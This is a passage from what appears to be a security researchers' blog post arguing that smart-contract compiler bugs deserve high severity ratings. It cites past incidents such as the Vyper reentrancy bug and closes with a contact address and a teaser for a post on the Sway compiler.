It’s uncommon for DApps to encounter compiler bugs, as code that triggers them often involves anti-patterns.

On the other hand, the counterarguments for high severity are:

It is unreasonable to expect DApp developers to catch compiler bugs during testing. Testing coverage is often insufficient, and even with high coverage, bugs may still go undetected.
Programming languages are meant to provide developers with a trusted foundation. If developers cannot rely on a language to function as intended, building anything useful becomes impossible.
Nearly all miscompilations have the potential to lead to critical consequences. If not taken seriously, it’s only a matter of time before compiler bugs result in significant losses.

While the consequences of compiler bugs are still up for debate, we want to highlight that negligence in compiler security has already had visible impacts in the industry. A few well-known examples include:

The Vyper reentrancy bug => over $26 million stolen.
The ZKSync-Aave optimization bug => fortunately identified before activation.
The Fuel-Swaylend buffer overflow vulnerability => Swaylend halted for 2 days.

Although it is common for people to underestimate the potential impact of vulnerabilities that have yet to be exploited, these recent examples demonstrate that compiler issues have become a real and present threat to our industry. Some of these incidents could likely have been avoided if reported vulnerabilities had received more attention and if security researchers had been more actively engaged in the process of reviewing fixes.

Bugs are an inherent part of the development process, and determining the timing and approach for addressing them is a crucial decision. The more seriously security bugs are handled, the less likely they are to come back to bite us later. If you are concerned about compiler bugs affecting your contracts or need help assessing the risks, contact us at th3.anatomist@gmail.com. We can help you conduct the most thorough and rigorous review.

In our next post, we will dive into the Sway compiler, breaking down the pipeline of modern compilers and examining the bugs we discovered during the Attackathon. Feel free to follow us on X to stay tuned!